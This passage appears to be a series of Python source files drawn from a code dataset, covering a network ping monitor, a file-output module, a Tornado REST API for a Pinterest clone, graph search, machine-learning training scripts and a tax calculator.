https://stackoverflow.com/questions/16145516/detecting-computer-program-shutdown-in-python\r\n# https://stackoverflow.com/questions/1411186/python-windows-shutdown-events\r\n\r\n# TODO maybe a calculator to show how long the internet was out for?\r\n# TODO change gatewayFinder() so that it only runs once.\r\ndef pingFinder():\r\n global managerNumber\r\n global amORpm\r\n global gatewayActual\r\n commandOutput = subprocess.check_output('ping -n 1 ' + gatewayActual)\r\n commandString = str(commandOutput)\r\n timeLocator = commandString.find('time=') # ususally 102 or so\r\n currentPing = int((commandString[(timeLocator + 5):(timeLocator + 6)]))\r\n if len(prevNums) <= 10: # Adds the pings to the list for averaging and printing\r\n prevNums.append(currentPing)\r\n elif len(prevNums) > 10: # Removes first entry and replaces it with the new one\r\n del prevNums[0]\r\n prevNums.append(currentPing)\r\n avgNum = int(sum(prevNums) / len(prevNums))\r\n # TODO Find a replacement for lambda\r\n clear = lambda: os.system('cls')\r\n clear()\r\n print('PingTester to ' + gatewayActual)\r\n print('Avg ping: %sms' % avgNum)\r\n for pings in prevNums: # Prints previous pings stored in prevNums\r\n print(pings, 'ms', sep='')\r\n print('\\n\\n\\nLast disconnect: ', end ='')\r\n disconnectIteration = 0\r\n for i in recentDisconnectTime:\r\n if disconnectIteration < 2:\r\n print(i, end=':')\r\n disconnectIteration += 1\r\n else:\r\n print(i, amORpm, '\\n', sep='')\r\n managerNumber = 0 # Resets the soundManager since ping was successful\r\n\r\n# TODO Needs optimazation\r\ndef timesorter():\r\n global recentDisconnectTime\r\n global amORpm, dateString, hour, minutes, seconds\r\n timeLocal = win32api.GetLocalTime()\r\n dateString, amORpm ='', 'am'\r\n hour, minutes, seconds = timeLocal[4], timeLocal[5], timeLocal[6]\r\n if hour == 0: hour = 12\r\n elif hour == 12: amORpm = 'pm'\r\n elif hour > 12:\r\n hour -= 12\r\n amORpm = 'pm'\r\n # Time is done. Now to handle the dates. Written days after.\r\n dateStamp = timeLocal[1], timeLocal[3], timeLocal[0]\r\n dateIteration = 0\r\n for dates in dateStamp:\r\n if dateIteration < 2:\r\n dateString += str(dates) + '-'\r\n dateIteration += 1 # Without this, format would be '6-26-2017-'\r\n else:\r\n dateString += str(dates)\r\n recentDisconnectTime = hour, minutes, seconds\r\n return hour, minutes, seconds, amORpm, dateString, recentDisconnectTime # Returns the time of the error\r\n\r\ndef activeTester():\r\n try:\r\n pingFinder()\r\n except subprocess.CalledProcessError:\r\n print('Connection Failed!')\r\n soundManager(), timesorter(), toDateOrNotToDate()\r\n # TODO change this write command to be better. Call globals for time too.\r\n fd = open('ConnectionLog.txt', mode='a')\r\n fd.write('Error occured @ %s:%s:%s%s\\n' % (hour, minutes, seconds, amORpm))\r\n fd.close()\r\n\r\ndef soundManager():\r\n global managerNumber\r\n if managerNumber == 0:\r\n win32api.MessageBeep(win32con.MB_ICONHAND)\r\n managerNumber += 1\r\n else:\r\n pass\r\n return 1 # Returns value so that it doesn't run again during same outage.\r\n\r\n# All lines in ConnectionLog gets added to dateEntryDecider\r\n# The list is then parsed with the parser varible\r\n# Then, it's converted to boolean and writes the date to file if it's not there and passes if it does.\r\ndef toDateOrNotToDate():\r\n dateEntryDecider = []\r\n global dateString\r\n with open('ConnectionLog.txt') as f:\r\n for lines in f: dateEntryDecider.append(lines)\r\n parser = re.compile(dateString).search(str(dateEntryDecider))\r\n if not bool(parser):\r\n fd = open('ConnectionLog.txt', 'a')\r\n fd.write('-------------%s-------------\\n' % dateString)\r\n fd.close()\r\n else: pass\r\n## -------------------------------------------------------------------##\r\n\r\ndef gatewayFinder():\r\n global gatewayActual\r\n commandOutput = str(subprocess.check_output('ipconfig'))\r\n gatewayPlace = commandOutput.find('Default ')\r\n gatewayActual = commandOutput[gatewayPlace + 36:gatewayPlace + 47]\r\n return gatewayActual\r\n\r\n# Run once:\r\ngatewayFinder()\r\n\r\ntry:\r\n while True:\r\n activeTester()\r\n time.sleep(2)\r\nexcept:\r\n input('''This should not be seen by anyone. Tell me if you can see this.\r\n \\nDo not close this window. \r\n \\nPress enter to continue.\r\n ''')\r\n\r\n","sub_path":"pingTesterV3.2.py","file_name":"pingTesterV3.2.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"444323574","text":"#!python\n# -*- coding: utf-8 -*-\n\"\"\"\n\t@package: \tbx.FILE\n\t@author: \tKRZYSZTOF \"@K0FF.EU\" K0FF\n\t@version: \t2.17.12\n\"\"\"\nimport bx\nimport os\n\n_target = None\n_outputs = {}\n_checks = {}\n\ndef PATH( filepath, checkExists = True ):\n\tfilepath = bx.unquote( filepath )\n\tif not filepath:\n\t\tbx.error('Invalid file path \"%s\"'%(filepath))\n\t\treturn False\n\tif os.name == 'nt':\n\t\tfilepath = filepath.lower()\n\tfilepath = os.path.abspath( filepath )\n\tif os.path.isdir( filepath ):\n\t\tbx.error('Invalid file path \"%s\"'%(filepath))\n\t\treturn False\n\tif checkExists:\n\t\tif not os.path.isfile( filepath ):\n\t\t\tbx.error('File \"%s\" not exists'%(filepath))\n\t\t\treturn False \t\t\t\n\treturn filepath\n\ndef LOAD( filepath, checkFilepath = True ):\n\tif checkFilepath:\n\t\tfilepath = bx.FILE.PATH( filepath )\n\tif filepath:\n\t\treturn open( filepath, 'r').read().splitlines()\t\t\n\tbx.error('File dont loaded')\n\treturn []\n\ndef IMPORT( filepath_short ):\n\tfilepath = bx.FILE.PATH( filepath_short )\n\tif filepath:\n\t\tif filepath in _checks and _checks[ filepath ]:\n\t\t\tbx.error('Illegal recursion to file \"%s\"'%(filepath_short))\n\t\t\treturn False\n\t\telse:\n\t\t\tif bx._FLAG_DEBUG:\n\t\t\t\tbx.debug('Import: \"%s\"'%(filepath_short))\n\t\tprevious_input = bx.var._get('@input')\n\t\tbx.var._set( '@input', filepath_short )\n\t\toutput = ''\n\t\t_checks[ filepath ] = True\n\t\tcode = bx.FILE.LOAD( filepath, False )\n\t\tif code:\n\t\t\tCODE = bx.code( file=filepath_short, code=code )\n\t\t\toutput = CODE.run()\n\t\t_checks[ filepath ] = False\n\t\tbx.var._set( '@input', previous_input )\n\t\tif not output:\n\t\t\treturn False\n\t\treturn output\n\treturn False\n\ndef OUTPUT( filepath_short = None ):\n\tif filepath_short and bx._FLAG_DEBUG:\n\t\tbx.debug('Set current output: \"%s\"'%( filepath_short ))\n\tglobal _target\n\tbx.var._set( '@output', filepath_short )\n\tif filepath_short == None:\n\t\t_target,filepath = None,_target\n\t\treturn filepath\n\tfilepath = bx.FILE.PATH( filepath_short, False )\n\tif filepath == _target:\n\t\treturn filepath\n\tif not filepath in _outputs:\n\t\t_outputs[ filepath ] = open( filepath, 'w' )\n\tfilepath,_target = _target,filepath\n\treturn filepath\n\ndef CLOSE():\n\tfor filepath in _outputs:\n\t\tif bx._FLAG_DEBUG:\n\t\t\tbx.debug('Close file \"%s\"'%(filepath))\n\t\t_outputs[ filepath ].close()\n\ndef output( text ):\n\tif text and _target:\n\t\tif bx._FLAG_DEBUG:\n\t\t\tbx.debug('Outpud saved to \"%s\"'%(bx.var('@output')))\n\t\t_outputs[ _target ].write( text )\n\n#\ndef SET_OUTPUT( name, value ):\n\tbx.FILE.OUTPUT( value )\n\t\n#\nbx.reg.ex('bx.vars.set',{\n\t\t'@output': SET_OUTPUT,\n\t})\n\n#\nbx.output = output\n","sub_path":"bx/FILE.py","file_name":"FILE.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"376003997","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#\n# Copyright 2016 Loren Chapple\n#\n\"\"\"\nPinterest cloan -- REST API\n\"\"\"\n\n\nimport json\nimport httplib\nfrom tornado import web, gen\nfrom user import User, UnauthorizedError\nfrom pin import Pin\nfrom userpin import UserPin\n\n\nclass PinterestAPI(web.Application):\n API_MAJOR_VERSION = 1\n API_MINOR_VERSION = 0\n\n def __init__(self, path_to_frontend, log):\n super(PinterestAPI, self).__init__([(r'/api/version$', VersionHandler),\n (r'/api/v1/users$', UsersHandler, {}, UsersHandler.__name__),\n (r'/api/v1/users/([^/.]+)$', UserMaintenanceHandler, {}, UserMaintenanceHandler.__name__),\n #\n # skip concept of boards for the moment... and just have pins owned by user directly\n # (r'/api/v1/users/([^/.]+)/boards$', BoardsHandler, {}, BoardsHandler.__name__),\n # (r'/api/v1/users/([^/.]+)/boards/([^/.]+)$', BoardMaintenanceHandler, {}, BoardMaintenanceHandler.__name__),\n # (r'/api/v1/users/([^/.]+)/boards/([^/.]+)/pins$', UserPinsHandler, {}, UserPinsHandler.__name__),\n # (r'/api/v1/users/([^/.]+)/boards/([^/.]+)/pins/([^/.]+)$', PinMaintenanceHandler, {}, PinMaintenanceHandler.__name__),\n #\n (r'/api/v1/pins$', RawPinsHandler, {}, RawPinsHandler.__name__),\n (r'/api/v1/pins/([^/.]+)$', RawPinMaintenanceHandler, {}, RawPinMaintenanceHandler.__name__),\n (r'/api/v1/users/([^/.]+)/pins$', UserPinsHandler, {}, UserPinsHandler.__name__),\n (r'/api/v1/users/([^/.]+)/pins/([^/.]+)$', PinMaintenanceHandler, {}, PinMaintenanceHandler.__name__),\n #\n (r'/(.*)$', web.StaticFileHandler, {'path': path_to_frontend, 'default_filename': 'index.html'})],\n cookie_secret='9d007b5fa7974d9a9b41a19741eec415')\n self.log = log\n self.base_uri = None # initialized when recieve 1st request\n\n def link(self, path):\n return self.base_uri + path\n\n def user_representation(self, user):\n rep = {'links': {'self': self.link(self.reverse_url(UserMaintenanceHandler.__name__, user.guid)),\n 'pins': self.link(self.reverse_url(UserPinsHandler.__name__, user.guid))}}\n rep.update(user.api_representation)\n return rep\n\n def pin_representation(self, pin):\n rep = {'links': {'self': self.link(self.reverse_url(RawPinMaintenanceHandler.__name__, pin.guid))}}\n rep.update(pin.api_representation)\n return rep\n\n def userpin_representation(self, userpin):\n rep = {'links': {'self': self.link(self.reverse_url(PinMaintenanceHandler.__name__, userpin.user_guid, userpin.pin_guid))}}\n rep.update(userpin.api_representation)\n return rep\n\n\n#\n# base handler to encapsulate common methods/info such as identity\n#\nclass BaseHandler(web.RequestHandler):\n AUTH_COOKIE = 'user'\n\n def prepare(self):\n super(BaseHandler, self).prepare()\n if not self.application.base_uri:\n self.application.base_uri = '{}://{}'.format(self.request.protocol, self.request.host)\n\n def compute_etag(self):\n return None # disable caching since Angular $resource doesn't deal with 304's well\n\n def get_current_user(self):\n return self.get_secure_cookie(self.AUTH_COOKIE)\n\n def set_current_user(self, guid):\n self.set_secure_cookie(self.AUTH_COOKIE, guid)\n\n def clear_current_user(self):\n self.clear_cookie(self.AUTH_COOKIE)\n\n\nclass UserResourceHandler(BaseHandler):\n def prepare(self):\n super(UserResourceHandler, self).prepare()\n # assumes first path arg in uri is the id of the resource owner\n authenticated_uid = self.get_current_user()\n if len(self.path_args) > 0 and authenticated_uid != self.path_args[0]:\n self.send_error(httplib.UNAUTHORIZED)\n\n\n#\n# admin endpoint handlers\n#\nclass VersionHandler(BaseHandler):\n def get(self):\n self.write({'major': self.application.API_MAJOR_VERSION,\n 'minor': self.application.API_MINOR_VERSION,\n 'api_version': '{}.{}'.format(self.application.API_MAJOR_VERSION, self.application.API_MINOR_VERSION)})\n\n\nclass UsersHandler(BaseHandler):\n @gen.coroutine\n def get(self):\n try:\n name = self.get_argument('name')\n pw = self.get_argument('pw')\n target_url = self.get_argument('next', None)\n except web.MissingArgumentError as e:\n self.application.log.info('Users GET (login) request malformed, error={}, url={}, body={}'.format(e, self.request.uri, self.request.body))\n self.send_error(httplib.BAD_REQUEST)\n return\n\n try:\n user = yield User.login(name, pw)\n except (ValueError, UnauthorizedError):\n self.send_error(httplib.UNAUTHORIZED)\n return\n\n self.set_current_user(user.guid)\n if target_url:\n self.redirect(target_url)\n else:\n self.write(self.application.user_representation(user))\n\n @gen.coroutine\n def post(self):\n try:\n body = json.loads(self.request.body)\n name = body['name']\n pw = body['pw']\n target_url = body.get('next')\n except (KeyError, ValueError, TypeError) as e:\n self.application.log.info('User creation request malformed, error={}, url={}, body={}'.format(e, self.request.uri, self.request.body))\n self.send_error(httplib.BAD_REQUEST)\n return\n\n exists = yield User.exists(name)\n if exists:\n self.send_error(httplib.CONFLICT)\n return\n\n user = User(name, pw)\n yield user.save()\n self.set_current_user(user.guid)\n if target_url:\n self.redirect(target_url)\n else:\n self.set_header('Location', self.reverse_url(UserMaintenanceHandler.__name__, user.guid))\n self.write(self.application.user_representation(user))\n self.set_status(httplib.CREATED)\n\n\nclass UserMaintenanceHandler(UserResourceHandler):\n @gen.coroutine\n def get(self, uid):\n try:\n user = yield User.fetch(uid)\n except KeyError:\n self.clear_current_user()\n self.send_error(httplib.NOT_FOUND)\n return\n\n self.write(self.application.user_representation(user))\n\n def patch(self, uid):\n raise NotImplementedError\n\n def delete(self, uid):\n raise NotImplementedError\n\n\nclass RawPinsHandler(BaseHandler):\n @gen.coroutine\n def get(self):\n limit = self.get_argument('limit', None)\n pins = yield Pin.list(limit)\n self.write({pin.guid: self.application.pin_representation(pin) for pin in pins})\n\n\nclass RawPinMaintenanceHandler(BaseHandler):\n @gen.coroutine\n def get(self, pid):\n try:\n pin = yield Pin.fetch(guid=pid)\n except KeyError:\n self.send_error(httplib.NOT_FOUND)\n return\n self.write(self.application.pin_representation(pin))\n\n\nclass UserPinsHandler(UserResourceHandler):\n @gen.coroutine\n def get(self, uid):\n limit = self.get_argument('limit', None)\n userpins = yield UserPin.list_for_user(uid, limit)\n self.write({upin.pin_guid: self.application.userpin_representation(upin) for upin in userpins})\n\n @gen.coroutine\n def post(self, uid):\n try:\n body = json.loads(self.request.body)\n pid = body.get('pin_id')\n content = body.get('content')\n image = body.get('image')\n title = body.get('title')\n caption = body.get('caption')\n private = body.get('private', False)\n if pid is None and content is None:\n raise KeyError\n except (KeyError, ValueError, TypeError):\n self.send_error(httplib.BAD_REQUEST)\n return\n\n try:\n pin = yield Pin.fetch(guid=pid, content=content)\n except KeyError:\n if not content:\n self.send_error(httplib.NOT_FOUND)\n return\n pin = Pin(content, image, title)\n yield pin.save()\n\n userpin = UserPin(uid, pin, caption, private)\n yield userpin.save()\n self.write(self.application.userpin_representation(userpin))\n self.set_status(httplib.CREATED)\n\n\nclass PinMaintenanceHandler(UserResourceHandler):\n @gen.coroutine\n def get(self, uid, pid):\n try:\n userpin = yield UserPin.fetch(uid, pid)\n except KeyError:\n self.send_error(httplib.NOT_FOUND)\n return\n self.write(self.application.userpin_representation(userpin))\n\n def patch(self, uid, pid):\n raise NotImplementedError\n\n @gen.coroutine\n def delete(self, uid, pid):\n yield UserPin.delete(uid, pid)\n self.set_status(httplib.NO_CONTENT)\n","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"154718061","text":"#!/bin/python3\n\ndef dfs(graph, start):\n visited = set()\n stack = [start]\n\n while stack:\n vertex = stack.pop()\n if vertex not in visited:\n visited.add(vertex)\n stack.extend(graph[vertex] - visited)\n return visited\n\n\n# main\nq = int(input().strip())\n\nfor a0 in range(q):\n graph = {}\n n, m, c_lib, c_road = map(int, input().strip().split(' '))\n\n for a1 in range(m):\n city_1, city_2 = input().strip().split(' ')\n\n if not graph.get(city_1): graph[city_1] = set()\n if not graph.get(city_2): graph[city_2] = set()\n\n graph[city_1].add(city_2)\n graph[city_2].add(city_1)\n\n if c_lib <= c_road:\n print(n * c_lib)\n continue\n\n cities = set(graph.keys())\n cost = 0\n visited = set()\n non_visited = cities - visited\n\n while non_visited:\n component = dfs(graph, non_visited.pop())\n cost += (len(component) - 1) * c_road + c_lib\n visited |= component\n non_visited = cities - visited\n\n print(cost)","sub_path":"algorithms/graph_theory/roads_and_libraries.py","file_name":"roads_and_libraries.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"155263213","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom sklearn import ensemble\r\nfrom sklearn import model_selection\r\nfrom sklearn import metrics\r\n\r\n\r\n# load data\r\ndf = pd.read_csv('E:/data/xc/samples2.csv')\r\nX = df[['x', 'y', 'GEO', 'PLANC', 'PRECI', 'TWI', 'TEMPR', 'SLOPE']]\r\ny = df['SOMB']\r\nX = np.array(X)\r\ny = np.array(y)\r\n\r\nnp.random.seed(314)\r\nX_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.3)\r\n\r\nnumberList = np.arange(1, 100)\r\nrmseList = []\r\n\r\nfor number in numberList:\r\n# params = {'n_estimators': number, 'max_depth': 4, 'min_samples_split': 2,\r\n# 'learning_rate': 0.01, 'loss': 'ls'}\r\n# clf = ensemble.GradientBoostingRegressor(**params)\r\n clf = ensemble.GradientBoostingRegressor(n_estimators=number)\r\n clf.fit(X_train, y_train)\r\n mse = metrics.mean_squared_error(y_test, clf.predict(X_test))\r\n rmse = np.sqrt(mse)\r\n print(number, ':\\t', rmse)\r\n rmseList.append(rmse)\r\n\r\nplt.scatter(numberList, rmseList)\r\n","sub_path":"boosting.py","file_name":"boosting.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"225081167","text":"import argparse\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom genotypes import PRIMITIVES\nfrom model_search import Network\nfrom torch.autograd import Variable\nfrom collections import namedtuple\n\n\ndef random_alphas(steps):\n k = sum(1 for i in range(steps) for n in range(2 + i))\n num_ops = len(PRIMITIVES)\n alphas_normal = []\n for i in range(steps):\n for n in range(2 + i):\n alphas_normal.append(Variable(torch.randn(1, num_ops).cuda(), requires_grad=True))\n return alphas_normal\n\n\ndef normalize_weights(alphas, steps):\n normal_weights = []\n n = 2\n start = 0\n for _ in range(steps):\n end = start + n\n for j in range(start, end):\n normal_weights.append(F.softmax(alphas[j], dim=-1).data.cpu().numpy())\n start = end\n n += 1\n return normal_weights\n\n\ndef parse(weights, steps):\n gene = []\n n = 2\n start = 0\n for i in range(steps):\n end = start + n\n W = weights[start:end].copy()\n edges = sorted(range(i + 2), key=lambda x: -max(W[x][k] for k in range(len(W[x])) if k != PRIMITIVES.index('none')))[:2]\n for j in edges:\n k_best = None\n for k in range(len(W[j])):\n if k != PRIMITIVES.index('none'):\n if k_best is None or W[j][k] > W[j][k_best]:\n k_best = k\n gene.append((PRIMITIVES[k_best], j))\n start = end\n n += 1\n multiplier = 4\n concat = range(2 + steps - multiplier, steps + 2)\n Genotype = namedtuple('Genotype', 'normal normal_concat')\n genotype_normal = Genotype(normal=gene, normal_concat=concat)\n return genotype_normal\n\n\nparser = argparse.ArgumentParser(\"modelnet\")\nparser.add_argument('--n_steps', type=int, default=3, help='total number of layers in one cell')\nparser.add_argument('--n_classes', type=int, default=121, help='total number of classes')\nparser.add_argument('--init_channels', type=int, default=32, help='num of init channels')\nparser.add_argument('--in_channels', type=int, default=50, help='num of init channels')\nparser.add_argument('--num_cells', type=int, default=1, help='total number of cells')\nparser.add_argument('--n_archs', type=int, default=1, help='Number of random architectures to output')\n\nargs = parser.parse_args()\n\ncriterion = torch.nn.BCEWithLogitsLoss().cuda()\nmodel = Network(args.init_channels, args.n_classes, args.num_cells, criterion,\n args.n_steps, in_channels=args.in_channels).cuda()\nalphas_normal = torch.cat(model.alphas_normal, dim=0)\n\nnum_opts = len(PRIMITIVES)\nopt_random_idx = np.random.randint(0, num_opts - 1, 2 * args.n_steps)\nconnection_random_idx = np.random.randint(0, args.n_steps, 2 * args.n_steps)\nfor i in range(args.n_archs):\n alphas_normal = random_alphas(args.n_steps)\n normal_weights = normalize_weights(alphas_normal, args.n_steps)\n gene_normal = parse(np.concatenate(normal_weights, axis=0), args.n_steps)\n\n print(gene_normal)\n","sub_path":"gcn/gcn_point/random_search.py","file_name":"random_search.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"417115515","text":"\"\"\"Exercise 1\n\nUsage:\n\n$ CUDA_VISIBLE_DEVICES=2 python practico_1_train_petfinder.py --dataset_dir ../ --epochs 30 --dropout 0.1 0.1 --hidden_layer_sizes 200 100\n\nTo know which GPU to use, you can check it with the command\n\n$ nvidia-smi\n\"\"\"\n\nimport argparse\n\nimport os\nimport mlflow\nimport numpy\nimport pandas\nimport tensorflow as tf\n\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras import layers, models\nfrom sklearn.utils import shuffle\nfrom itertools import zip_longest\n\nTARGET_COL = 'AdoptionSpeed'\n\n\ndef read_args():\n parser = argparse.ArgumentParser(\n description='Training a MLP on the petfinder dataset')\n # Here you have some examples of classifier parameters. You can add\n # more arguments or change these if you need to.\n parser.add_argument('--dataset_dir', default='./', type=str,\n help='Directory with the training and test files.')\n parser.add_argument('--hidden_layer_sizes', nargs='+', default=[100], type=int,\n help='Number of hidden units of each hidden layer.')\n parser.add_argument('--epochs', default=10, type=int,\n help='Number of epochs to train.')\n parser.add_argument('--dropout', nargs='+', default=[0.5], type=float,\n help='Dropout ratio for every layer.')\n parser.add_argument('--batch_size', type=int, default=32,\n help='Number of instances in each batch.')\n parser.add_argument('--experiment_name', type=str, default='Base model',\n help='Name of the experiment, used in mlflow.')\n parser.add_argument('--one_hot_columns', nargs='+', type=str, default=['Gender', 'Color1'],\n help='Name of column to be one hot encoded.')\n parser.add_argument('--embedding_columns', nargs='+', type=str, default=['Breed1'],\n help='Name of columns to be embedded.')\n args = parser.parse_args()\n\n assert len(args.hidden_layer_sizes) == len(args.dropout)\n return args\n\n\ndef process_features(df, one_hot_columns, numeric_columns, embedded_columns, test=False):\n direct_features = []\n\n # Create one hot encodings\n for one_hot_col, max_value in one_hot_columns.items():\n direct_features.append(tf.keras.utils.to_categorical(df[one_hot_col] - 1, max_value))\n\n # Create and append numeric columns\n\n for numeric_column in numeric_columns:\n direct_features.append(tf.keras.utils.normalize(df[numeric_column].values.reshape(-1,1)))\n \n features = {'direct_features': numpy.hstack(direct_features)}\n\n # Create embedding columns - nothing to do here. We will use the zero embedding for OOV\n for embedded_col in embedded_columns.keys():\n features[embedded_col] = df[embedded_col].values\n\n if not test:\n nlabels = df[TARGET_COL].unique().shape[0]\n # Convert labels to one-hot encodings\n targets = tf.keras.utils.to_categorical(df[TARGET_COL], nlabels)\n else:\n targets = None\n\n return features, targets\n\n\ndef load_dataset(dataset_dir, batch_size):\n # Read train dataset (and maybe dev, if you need to...)\n dataset, dev_dataset = train_test_split(\n pandas.read_csv(os.path.join(dataset_dir, 'train.csv')), test_size=0.2)\n\n test_dataset = pandas.read_csv(os.path.join(dataset_dir, 'test.csv'))\n\n print('Training samples {}, test_samples {}'.format(\n dataset.shape[0], test_dataset.shape[0]))\n\n return dataset, dev_dataset, test_dataset\n\n\ndef build_model(embedded_columns, direct_features_input, direct_features_input_shape,\n hidden_layer_sizes, dropouts, n_labels):\n tf.keras.backend.clear_session()\n\n embedding_layers = []\n inputs = []\n for embedded_col, max_value in embedded_columns.items():\n input_layer = layers.Input(shape=(1,), name=embedded_col)\n inputs.append(input_layer)\n embedding_size = int(max_value / 4)\n embedding_layers.append(\n tf.squeeze(layers.Embedding(input_dim=max_value, output_dim=embedding_size)(input_layer), axis=-2))\n print('Adding embedding of size {} for layer {}'.format(embedding_size, embedded_col))\n\n direct_features_input = layers.Input(shape=direct_features_input_shape, name='direct_features')\n inputs.append(direct_features_input)\n\n features = layers.concatenate(embedding_layers + [direct_features_input])\n\n if len(hidden_layer_sizes) > 0:\n hidden_layer_size = hidden_layer_sizes.pop(0)\n last_hidden_layer = layers.Dense(hidden_layer_size, activation='relu')(features)\n if len(dropouts) > 0:\n dropout = dropouts.pop(0)\n last_hidden_layer = layers.Dropout(dropout)(last_hidden_layer)\n \n if len(dropouts) > len(hidden_layer_sizes):\n dropouts = dropouts[:len(hidden_layer_sizes)]\n \n for hidden_layer_size, dropout in zip_longest(hidden_layer_sizes, dropouts, fillvalue=None):\n if hidden_layer_size != None:\n last_hidden_layer = layers.Dense(hidden_layer_size, activation='relu')(last_hidden_layer)\n if dropout != None:\n last_hidden_layer = layers.Dropout(dropout)(last_hidden_layer)\n \n output_layer = layers.Dense(n_labels, activation='softmax')(last_hidden_layer)\n return models.Model(inputs=inputs, outputs=output_layer)\n\n\ndef main():\n args = read_args()\n dataset, dev_dataset, test_dataset = load_dataset(args.dataset_dir, args.batch_size)\n nlabels = dataset[TARGET_COL].unique().shape[0]\n \n one_hot_columns = {\n one_hot_col: dataset[one_hot_col].max()\n for one_hot_col in args.one_hot_columns\n }\n embedded_columns = {\n embedded_col: dataset[embedded_col].max() + 1\n for embedded_col in args.embedding_columns\n }\n numeric_columns = ['Age', 'Fee']\n\n dataset = shuffle(dataset, random_state=12345)\n \n X_train, y_train = process_features(dataset, one_hot_columns, numeric_columns, embedded_columns)\n direct_features_input_shape = (X_train['direct_features'].shape[1],)\n X_dev, y_dev = process_features(dev_dataset, one_hot_columns, numeric_columns, embedded_columns)\n \n batch_size = args.batch_size\n\n train_ds = tf.data.Dataset.from_tensor_slices((X_train, y_train)).batch(batch_size)\n dev_ds = tf.data.Dataset.from_tensor_slices((X_dev, y_dev)).batch(batch_size)\n X_test, y_test = process_features(\n test_dataset, one_hot_columns, numeric_columns, embedded_columns, test=True)\n test_ds = tf.data.Dataset.from_tensor_slices(X_test).batch(batch_size)\n\n model = build_model(embedded_columns, X_train['direct_features'], direct_features_input_shape, \n args.hidden_layer_sizes,\n args.dropout,\n nlabels)\n\n model.compile(loss='categorical_crossentropy', \n optimizer='adam',metrics=['accuracy'])\n\n print(model.summary())\n\n mlflow.set_experiment(args.experiment_name)\n\n with mlflow.start_run(nested=True):\n mlflow.log_param('hidden_layer_sizes', args.hidden_layer_sizes)\n mlflow.log_param('dropout', args.dropout)\n mlflow.log_param('embedded_columns', embedded_columns)\n mlflow.log_param('one_hot_columns', one_hot_columns)\n mlflow.log_param('numeric_columns', numeric_columns)\n mlflow.log_param('epochs', args.epochs)\n\n history = model.fit(train_ds, epochs=args.epochs, validation_data=dev_ds, verbose=0)\n\n print(history.history.keys())\n\n\n loss, accuracy = 0, 0\n loss, accuracy = model.evaluate(dev_ds)\n print(\"*** Dev loss: {} - accuracy: {}\".format(loss, accuracy))\n mlflow.log_metric('dev_loss', loss)\n mlflow.log_metric('dev_accuracy', accuracy)\n \n predictions = 'No prediction yet'\n predictions = model.predict(test_ds)\n\n test_dataset[\"AdoptionSpeed\"] = predictions.argmax(axis=1)\n test_dataset.to_csv(\"./submission.csv\", index=False, columns=[\"PID\", \"AdoptionSpeed\"])\n print(predictions)\n\n \nprint('All operations completed')\n\n\nprint('All operations completed')\n\nif __name__ == '__main__':\n main()\n","sub_path":"practico_1_train_petfinder.py","file_name":"practico_1_train_petfinder.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"189094769","text":"\"\"\"\r\nCalculate the total to charge for an order from an online store in Canada\r\n\"\"\"\r\ncountryName=input(\"What country are you from? (enter in capital letters only) : \")\r\ntotalAmount=float(input(\"What is your total order amount? : \"))\r\nif not countryName ==\"CANADA\":\r\n print(\"Total amount with taxes is\", totalAmount)\r\nif countryName == \"CANADA\":\r\n province = input(\"What is your province from Canada? (Enter in capital letters only) \")\r\n if province == \"ALBERTA\" :\r\n print(\"Total amount with taxes is\", totalAmount+(0.05*totalAmount))\r\n elif province == \"ONTARIO\" or province ==\"NEW BRUNSWICK\" or province ==\"NOVA SCOTIA\":\r\n print(\"Total amount with taxes is\",totalAmount+(0.13*totalAmount))\r\n else:\r\n print(\"Total amount with taxes is\" ,totalAmount + (0.11 * totalAmount))\r\n","sub_path":"TaxCharges_on_order.py","file_name":"TaxCharges_on_order.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"309375946","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport random as ran\nimport pandas as pd\nimport math\nimport csv\n\n# Vector 2D\nclass Vector2:\n x = 0\n y = 0\n def __init__(self, x_a, y_a):\n self.x = x_a\n self.y = y_a\n def values(self):\n print(\"(\" + str(self.x) + \", \" + str(self.y) + \")\")\n @staticmethod\n def distance(vA, vB):\n dist = math.sqrt(pow((vA.x - vB.x), 2) + pow((vA.y - vB.y), 2))\n return dist\n\n# Inputting from Files\n# Neurons\nneuronPoints = []\nneuronsCSVPath = 'neurons.csv'\ndef neuronsCSVParse():\n data = pd.read_csv(neuronsCSVPath, names=['age', 'cp'])\n records = data.to_dict(orient='record')\n for row in records:\n neuronPoints.append(Vector2(row['age'], row['cp']))\n for point in neuronPoints:\n point.values()\n# Vectors\nvectors = []\nvectorsCSVPath = 'vectors.csv'\ndef neuronsCSVParse():\n data = pd.read_csv(vectorsCSVPath, names=['w_age', 'w_cp'])\n records = data.to_dict(orient='record')\n for row in records:\n vectors.append(Vector2(row['w_age'], row['w_cp']))\n for vector in vectors:\n vector.values()\n\n# Plot Points on the Map\ndef draw(points):\n for point in points:\n plt.scatter(point.x, point.y)\n plt.show()\n\n# Changing Weight and Overriding the old Vectors\nalpha = 0.4\ndef changedVector(neuron: Vector2, winner: Vector2):\n x = neuron.x + alpha * (winner.x - neuron.x)\n y = neuron.y + alpha * (winner.y - neuron.y)\n newNeuron = Vector2(x, 